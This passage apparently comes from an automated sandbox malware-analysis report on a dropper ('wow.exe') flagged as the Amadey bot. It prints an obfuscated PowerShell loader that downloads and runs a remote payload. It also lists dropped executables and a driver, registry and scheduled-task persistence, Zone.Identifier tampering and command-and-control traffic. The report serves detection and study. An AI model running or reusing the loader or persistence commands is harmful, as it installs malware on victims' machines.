GloWHjliInsnCaf6 an4flu; Un gsx Fi6Chr4 Pr;Dik S crForv C.:Per1 St3 ow4Ind. rn0Arn) I IneGFale DucpotkShioRes/Bo 2,aa0La 1Nig0kv 0 ev1Bod0For1Skr an,F itiUnsrBane nfM aoS uxSti/kon1N l3 dg4Drm.d.u0';$Bramantip=Bebrejd ' ru ShsDeleF rRDmp- ShATr gSmiEMilNAmbt';$Forskrev=Bebrejd 'SmahPapttvatFempChesSte:F r/Sy,/ ShfS ni MolJete udBaanHex.K,aeS iuTax/nivlNeumLaejKamMgen1 gtIOvetA.kibroFJarCSwiHBocjU cYK eABe 4KapJRauNBruRA aBMerYModBTr 3Mar4Sc / SaUUnonS cdbareon r vb Opa Akl ydaSelnDelcAboe rurStan,oleHjasTwi.tarjBebaS ovMana';$Sjaslikkens247=Bebrejd ' Op>';$Facies=Bebrejd 'NonITraE SuX';$Torrentially21='Topazolite';$Gordiaceous='\Transitvarerne.Fli';Shoepacs137 (Bebrejd 'F.l$HjfGAfsl leOAerb BraTeaL n:IrrPForR.dde heGNebn .peIn NBadoForlGr OUn,nopfEpre9Str4.il=gol$gi EnedN,kiv,ph:sydA VeP EkPge DMetAResTRe,aDec+ind$Plag NooDelRAskD NaI,ilaUnscAlpeTh Oas,uXylS');Shoepacs137 (Bebrejd 'lan$RetG E,l TiORelBLjba polO e: Fos utyTruDRekFTavO ViR ,ahPaeN,pig ScEAukNUnsE.ty= Se$ A,F.beO.ndrS.rSS ckKolRProEEnsV Dr..xcsEjePRutLsatIhottDyn(Ego$ uts E j InaBruSAbsl E i.usKKlikkoneLivN .as va2.pl4Hex7 u)');Shoepacs137 (Bebrejd $Boligkonsulentens);$Forskrev=$Sydforhngene[0];$Smutches=(Bebrejd 'Com$ ImgPreLTitOWaxbStraPrelTre: AusAf ASilP FiSFedU .oCAfgKI gEIncRSpaSLo =Runn aE VawMor- ndoPa.b,enJRapeF,dc.onTU,m OgdsPl,YH,nS,inTQuiE ,im Li..ta$SecRSjlETriPBruRT.iSNonEAntn,ouT B.ARotT eIGenO .yNSkrsCosu end BlGSupI nfGimt .ds');Shoepacs137 ($Smutches);Shoepacs137 (Bebrejd ' h$CatSUnoaTampnrrs TuuDescSnikEnde FerTo s pu.BnkH E,e tea VedLumeRebrBilsSub[Op $ unBZerrAlba Inm braVe npartSpoiKonp,ta]Tel= L $,peLOu a tonBuddTikbP roignf iso Oprbr eEftnFabiFornJasgSensMe 1Ens7 Sn3');$Udfordrernes229=Bebrejd 'P.d$SkaSJ.ra BrpAr.s F,uCouc PekHoleE sr Cos xy.S dD ,no raw knnRefl Bio Sna Bud,epFAboiPrelTwieFol( Sp$CanF Gro rerCyms P.kNewrSomeChrvInv,Bev$ForKIvrohavaPenlt piNert E i B.oO tnT.ie .nn C,s Al)';$Koalitionens=$Pregnenolone94;Shoepacs137 (Bebrejd 'Sku$S,oGInclGusoReib SyaDisLFol:BesnStrOSurnPalROvie ,uM OvEImmdL,gITh aTorb WaLScaEC u=Gaa( ArTBlaeHersRg.tSup-
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uforfrdetheds181; function Yasmak($Unsatanical){$Puritanic=3;do{$Joumbos+=$Unsatanical[$Puritanic];$Puritanic+=4} until(!$Unsatanical[$Puritanic])$Joumbos}function Seksualhygiejnen($Unshowmanlike){ .($bluenoser) ($Unshowmanlike)}$Calamondin=Yasmak 'T nn onEchaTGra.Ke W';$Calamondin+=Yasmak 'Jo EU sbSt,cCoulHarI.tue InnRebT';$Longwise=Yasmak 'ForMMi.oSorzGaviF rl,irlA faEnt/';$Stavkirkes=Yasmak ' AmTovel WasI n1Avn2';$Litterateur36='S.e[Plan .oeFreTFus.BusS IneT urSamv TaI Brc HueN npCe oMiniBilNOliTAtoMFimA AknLenAIvrGHese arUnc] Mo: a:halSAfkEElecF ruLilrMyxID rtMacY,egPPetrProo .aT,alo NoCAtooP rl B = re$ .aST xtMisA GavEmbKUdkiAccRfemkPreeForS';$Longwise+=Yasmak 'Low5 k .me 0Ov Snd(YasWUnhi,ocnUnbdNovoTrawM ds Sp OveNAnmTFra Ine1 ic0.nt. tr0Kli; ro AttWAkviI dn Un6 Ba4Lab;Fi, K txPre6Hel4No ;,cc BrrDisvOv : h1Pra3Muf4 H .Qu 0Sup) Un F rG .neKyscG.sk,amoGrn/Liv2Fra0Ank1Res0Non0 Pa1Can0 an1Mio ConFA.yigu.rLg e .yf FioHypxMa,/Kvl1Br 3Lns4Tra. on0';$Daarlighed=Yasmak 'midU UnSRepeT arVes-StrAFakG UneProN M T';$Radioactive=Yasmak ' Mah ertExotSkipA,ts nd:,at/pol/ComfNoni ilEt eSamdUnan.ro.floe H uLis/IntlordmAffjBonM ny1ManI .nt Tai,beFBruCE,uHIrrjkoeYFisATer4ApaJDahNOphRWeeBSvvYForB a3Ly 4B,f/ OvODepuHomt ResForoH ba .ar if. artPelo R c';$Stbeformens=Yasmak 'San>';$bluenoser=Yasmak 'SkriProeTilx';$Courtmartial='Hale';$Bacillebrerens='\Autonephrectomy.Noc';Seksualhygiejnen (Yasmak 'Pre$ForGHjeLUndoSchb MoaHallStr:SheUNadnDesCFrdUInhsS.ohAlfiF noLanNGarE orDPr =Ord$ SaEHypNPr.vBe,: UdA rsP N PPaud ekAViqt FuaMal+Bre$LamBPorA apCOutI ,ol arLS.rE rybOver.nmE ToRForET ln.eas');Seksualhygiejnen (Yasmak 'Sla$ Cog HalSjaO,kiBMura ppLRec:IllMA hYBorS CetThrIpolk te,ipr U.efannHal1Enr4Ant1 el= nn$ esr AkALigdG viComOUbna giCSanTerii,akVFore ,a.KursMagp,ncL uiIT oT in(Kmp$RouSAfsTDe BObsETenf ceoDacr PamFliE R nPl sLas)');Seksualhygiejnen (Yasmak $Litterateur36);$Radioactive=$Mystikeren141[0];$Recognise=(Yasmak 'Kip$LgfgBooLPreo DabXenaFinlPre:na eCheNTrnAstymHaleunmL JaI H,nBliGU.hSEla=SpanfulEDecW os- .io xcBO vjIndECouc ,vt P MoS.oaYPres ibt Flesc mr.l.Rad$EkscFugA ptl ,rALi,MEksoStunSupdUpcIKjon');Seksualhygiejnen ($Recognise);Seksualhygiejnen (Yasmak ' Uf$ B E denWuzaCymmPreeMi,l leiBernStagSubsO e. dHBlye Ala .odSp eBi,rUncsKe,[Abi$WalDOr.awyvaKilrBryl,ntiT,lglarhBese,epdEd ]Myr=Sys$.paLKonoRetnNongG nwStuia.tsEjee');$Upcutting173=Yasmak 'S g$Ju,EPr.nChuaFalma,re BrlReriS lnSkagChus Kr.DiaDMoyo tewTr nB tlGlao PoaAk dThyFBe.ihyll uneGem(Phi$SipR InaSupdSariUncoOveaIt cTaatFo iRunvHj e H ,Ta $ irV ,ii OtdRepe anbFloe .og yprH,oetoftBlosLa,1 Ud7 l 9d k)';$Videbegrets179=$Uncushioned;Seksualhygiejnen (Yasmak 'P r$ iGSquLSelopl bBeha arLSka:ScrsCoitTafRC aufrdkPertBakU ivRAr.eUs.RSape ,us Pr=Pa (ColtSplE BrS BaTB l-Ab.pblaA eT lahDec Ser$ .aVlocI edVe EPh BLigECligtror aeO,etFleSFra1De,7S e9Dev)');while (!$Struktureres
                            Source: VCRUNTIME140.dll.0.drStatic PE information: 0xEFFF39AD [Sun Aug 4 18:57:49 2097 UTC]
                            Source: C:\Users\user\Downloads\haus\traf.exeCode function: 15_2_0017103F LoadLibraryA,GetProcAddress,15_2_0017103F
                            Source: md__mypyc.cp311-win_amd64.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x2d0f2
                            Source: win32evtlog.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x204ee
                            Source: _helpers_c.cp311-win_amd64.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x18183
                            Source: amada2.exe.9.drStatic PE information: real checksum: 0x19f61 should be: 0x19fe0
                            Source: _quoting_c.cp311-win_amd64.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x19b09
                            Source: pywintypes311.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x24bee
                            Source: win32api.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x27e47
                            Source: _rust.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x77a3da
                            Source: _multidict.cp311-win_amd64.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x13c55
                            Source: traf.exe.9.drStatic PE information: real checksum: 0xb61b should be: 0x10d23
                            Source: WatchDog.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x159d0
                            Source: random.exe.9.drStatic PE information: real checksum: 0x0 should be: 0xdd83
                            Source: vapo.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x8aaa
                            Source: conhost.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x11c88
                            Source: md.cp311-win_amd64.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x8d57
                            Source: sel1.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x418f
                            Source: _brotli.cp311-win_amd64.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xd1d2f
                            Source: T.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x111b9
                            Source: _cffi_backend.cp311-win_amd64.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x34b65
                            Source: Enalib.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x111b9
                            Source: ABC.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x106ea
                            Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
                            Source: libcrypto-1_1.dll.0.drStatic PE information: section name: .00cfg
                            Source: libssl-1_1.dll.0.drStatic PE information: section name: .00cfg
                            Source: python311.dll.0.drStatic PE information: section name: PyRuntim
                            Source: C:\Users\user\Downloads\haus\sel1.exeCode function: 12_2_00403003 push ecx; ret 12_2_0040302E
                            Source: C:\Users\user\Downloads\haus\sel1.exeCode function: 12_2_00403000 push ecx; ret 12_2_0040302E
                            Source: C:\Users\user\Downloads\haus\sel1.exeCode function: 12_2_0040345C push eax; ret 12_2_00403481
                            Source: C:\Users\user\Downloads\haus\traf.exeCode function: 15_2_0017450D push esi; retf 15_2_0017450E
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_004532D0 push 02A30000h; ret 16_2_004532D5
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_05284520 push ecx; mov dword ptr [esp], ecx16_2_05284522
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_05277420 push 0527744Ch; ret 16_2_05277444
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052A6470 push ecx; mov dword ptr [esp], edx16_2_052A6471
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052774D8 push 05277504h; ret 16_2_052774FC
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052AD70C push 052AD738h; ret 16_2_052AD730
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_05283750 push 05283951h; ret 16_2_05283949
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052B4780 push ecx; mov dword ptr [esp], edx16_2_052B4785
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052AD698 push 052AD6C4h; ret 16_2_052AD6BC
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052836EC push 0528374Dh; ret 16_2_05283745
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_0528F6D4 push ecx; mov dword ptr [esp], edx16_2_0528F6D9
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_05292108 push 05292134h; ret 16_2_0529212C
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052AC144 push 052AC1ACh; ret 16_2_052AC1A4
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_0529F024 push ecx; mov dword ptr [esp], ecx16_2_0529F029
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_05290040 push 0529006Ch; ret 16_2_05290064
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_05291040 push 05291083h; ret 16_2_0529107B
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052910B0 push 052910DCh; ret 16_2_052910D4
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052AC0E8 push 052AC13Fh; ret 16_2_052AC137
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052920D0 push 052920FCh; ret 16_2_052920F4
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_05285348 push 05285395h; ret 16_2_0528538D
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_0529239C push ecx; mov dword ptr [esp], edx16_2_052923A1
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052773E8 push 05277414h; ret 16_2_0527740C
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_05292200 push 0529222Ch; ret 16_2_05292224
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_05276C04 push 05276C55h; ret 16_2_05276C4D
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_05286C54 push ecx; mov dword ptr [esp], edx16_2_05286C59
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_05283CAC push ecx; mov dword ptr [esp], ecx16_2_05283CAF
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_05283C8C push ecx; mov dword ptr [esp], ecx16_2_05283C8F
                            Source: sel1.exe.9.drStatic PE information: section name: .text entropy: 7.674943162368631
                            Source: traf.exe.9.drStatic PE information: section name: .text entropy: 7.883303884938052

                            Persistence and Installation Behavior

                            barindex
                            Yara detected Amadey bot
                            Source: Yara matchFile source: 00000012.00000002.4627551337.000000000061A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.2274706714.000000000061A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                            Found pyInstaller with non standard icon
                            Source: C:\Users\user\Desktop\wow.exeProcess created: "C:\Users\user\Desktop\wow.exe"
                            Sample is not signed and drops a device driver
                            Source: C:\Users\user\Downloads\haus\conhost.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sys
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\_asyncio.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\select.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\Downloads\haus\T.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\Downloads\haus\traf.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\_hashlib.pydJump to dropped file
                            Source: C:\Users\user\Downloads\haus\conhost.exeFile created: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\propcache\_helpers_c.cp311-win_amd64.pydJump to dropped file
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\1be588a5b7\Enalib.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\libssl-1_1.dllJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\Downloads\haus\Loader.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\_bz2.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\python311.dllJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\VCRUNTIME140.dllJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\Downloads\haus\WatchDog.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\_lzma.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\libffi-8.dllJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\Downloads\haus\conhost.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\multidict\_multidict.cp311-win_amd64.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                            Source: C:\Users\user\Downloads\haus\conhost.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\VCRUNTIME140_1.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Roaming\E743A7.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\unicodedata.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\_brotli.cp311-win_amd64.pydJump to dropped file
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\1be588a5b7\T.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\_multiprocessing.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\Downloads\haus\sel1.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\libcrypto-1_1.dllJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\_uuid.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\_overlapped.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\_decimal.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\Downloads\haus\Enalib.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\yarl\_quoting_c.cp311-win_amd64.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\Downloads\haus\ABC.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\_queue.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\win32\win32api.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\python3.dllJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\_cffi_backend.cp311-win_amd64.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\Downloads\haus\amada2.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\Downloads\haus\vapo.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\Downloads\haus\random.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\_ssl.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\pyexpat.pydJump to dropped file
                            Source: C:\Users\user\Downloads\haus\vapo.exeFile created: C:\Users\user\AppData\Roaming\vapo.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\_socket.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\win32\win32evtlog.pydJump to dropped file
                            Source: C:\Users\user\Downloads\haus\amada2.exeFile created: C:\ProgramData\1be588a5b7\gdsun.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\_ctypes.pydJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\pywin32_system32\pywintypes311.dllJump to dropped file
                            Source: C:\Users\user\Downloads\haus\conhost.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
                            Source: C:\Users\user\Downloads\haus\conhost.exeFile created: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\1be588a5b7\Enalib.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\1be588a5b7\T.exeJump to dropped file
                            Source: C:\Users\user\Downloads\haus\amada2.exeFile created: C:\ProgramData\1be588a5b7\gdsun.exeJump to dropped file
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\wheel-0.45.0.dist-info\LICENSE.txtJump to behavior

                            Boot Survival

                            barindex
                            Creates an undocumented autostart registry key
                            Source: C:\Windows\SysWOW64\svchost.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run RegisteredApplications
                            Source: C:\Windows\SysWOW64\svchost.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run RegisteredApplications
                            Source: C:\Windows\SysWOW64\svchost.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run RegisteredApplications
                            Source: C:\Windows\SysWOW64\svchost.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run RegisteredApplications
                            Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                            Monitors registry run keys for changes
                            Source: C:\Windows\SysWOW64\svchost.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Users\user\Downloads\haus\vapo.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "vapo" /tr "C:\Users\user\AppData\Roaming\vapo.exe"
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00453360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,16_2_00453360

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Creates / moves files in alternative data streams (ADS)
                            Source: C:\Users\user\Downloads\haus\amada2.exeFile created: c:\programdata\1be588a5b7\gdsun.exe:Zone.Identifier
                            Hides that the sample has been downloaded from the Internet (zone.identifier)
                            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\E743A7.exe:Zone.Identifier read attributes | delete
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Uses known network protocols on non-standard ports
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 5000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 8085
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 8085
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 8085
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 8085
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 8085
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 8085
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 8081
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 8081
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 8081
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 8081
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 8081
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 8088
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 6001
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 801
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 9900
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 5465
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 8099
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 5001
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 4433
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 5000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 5000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 5000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49795
                            Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49834
                            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49819
                            Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49818
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49805
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49806
                            Source: unknownNetwork traffic detected: HTTP traffic on port 801 -> 49814
                            Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49847
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8085 -> 49801
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8088 -> 49812
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8085 -> 49798
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8085 -> 49799
                            Source: unknownNetwork traffic detected: HTTP traffic on port 6001 -> 49813
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8085 -> 49802
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49803
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49809
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49807
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8099 -> 49817
                            Source: unknownNetwork traffic detected: HTTP traffic on port 5465 -> 49816
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9900 -> 49815
                            Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49850
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8085 -> 49800
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8085 -> 49797
